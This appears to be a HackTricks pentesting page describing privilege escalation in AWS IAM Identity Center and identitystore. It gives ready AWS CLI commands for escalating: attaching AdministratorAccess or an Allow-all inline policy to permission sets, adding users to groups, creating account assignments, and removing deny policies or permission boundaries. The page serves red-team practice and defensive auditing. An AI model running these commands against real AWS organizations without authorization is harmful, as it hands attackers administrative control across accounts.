AWS - SSO & identitystore Privesc

Reading time: 6 minutes

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

AWS Identity Center / AWS SSO

For more information about AWS Identity Center / AWS SSO check:

AWS - IAM, Identity Center & SSO Enum

warning

Note that by default, only users with permissions form the Management Account are going to be able to access and control the IAM Identity Center.
Users from other accounts can only allow it if the account is a Delegated Adminstrator.
Check the docs for more info.

Reset Password

An easy way to escalate privileges in cases like this one would be to have a permission that allows to reset users passwords. Unfortunately it's only possible to send an email to the user to reset his password, so you would need access to the users email.

identitystore:CreateGroupMembership

With this permission it's possible to set a user inside a group so he will inherit all the permissions the group has.

bash
aws identitystore create-group-membership --identity-store-id <tore-id> --group-id <group-id> --member-id UserId=<user-id>

sso:PutInlinePolicyToPermissionSet, sso:ProvisionPermissionSet

An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control

bash
# Set an inline policy with admin privileges
aws sso-admin put-inline-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --inline-policy file:///tmp/policy.yaml

# Content of /tmp/policy.yaml
{
	"Version": "2012-10-17",
	"Statement": [
		{
			"Sid": "Statement1",
			"Effect": "Allow",
			"Action": ["*"],
			"Resource": ["*"]
		}
	]
}

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:AttachManagedPolicyToPermissionSet, sso:ProvisionPermissionSet

An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control

bash
# Set AdministratorAccess policy to the permission set
aws sso-admin attach-managed-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess"

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:AttachCustomerManagedPolicyReferenceToPermissionSet, sso:ProvisionPermissionSet

An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control.

warning

To abuse these permissions in this case you need to know the name of a customer managed policy that is inside ALL the accounts that are going to be affected.

bash
# Set AdministratorAccess policy to the permission set
aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --customer-managed-policy-reference <customer-managed-policy-name>

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:CreateAccountAssignment

An attacker with this permission could give a Permission Set to a user under his control to an account.

bash
aws sso-admin create-account-assignment --instance-arn <instance-arn> --target-id <account_num> --target-type AWS_ACCOUNT --permission-set-arn <permission_set_arn> --principal-type USER --principal-id <principal_id>

sso:GetRoleCredentials

Returns the STS short-term credentials for a given role name that is assigned to the user.

aws sso get-role-credentials --role-name <value> --account-id <value> --access-token <value>

However, you need an access token that I'm not sure how to get (TODO).

sso:DetachManagedPolicyFromPermissionSet

An attacker with this permission can remove the association between an AWS managed policy from the specified permission set. It is possible to grant more privileges via detaching a managed policy (deny policy).

bash
aws sso-admin detach-managed-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --managed-policy-arn <ManagedPolicyARN>

sso:DetachCustomerManagedPolicyReferenceFromPermissionSet

An attacker with this permission can remove the association between a Customer managed policy from the specified permission set. It is possible to grant more privileges via detaching a managed policy (deny policy).

bash
aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn <value> --permission-set-arn <value> --customer-managed-policy-reference <value>

sso:DeleteInlinePolicyFromPermissionSet

An attacker with this permission can action remove the permissions from an inline policy from the permission set. It is possible to grant more privileges via detaching an inline policy (deny policy).

bash
aws sso-admin delete-inline-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN>

sso:DeletePermissionBoundaryFromPermissionSet

An attacker with this permission can remove the Permission Boundary from the permission set. It is possible to grant more privileges by removing the restrictions on the Permission Set given from the Permission Boundary.

bash
aws sso-admin   delete-permissions-boundary-from-permission-set --instance-arn <value> --permission-set-arn <value>

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks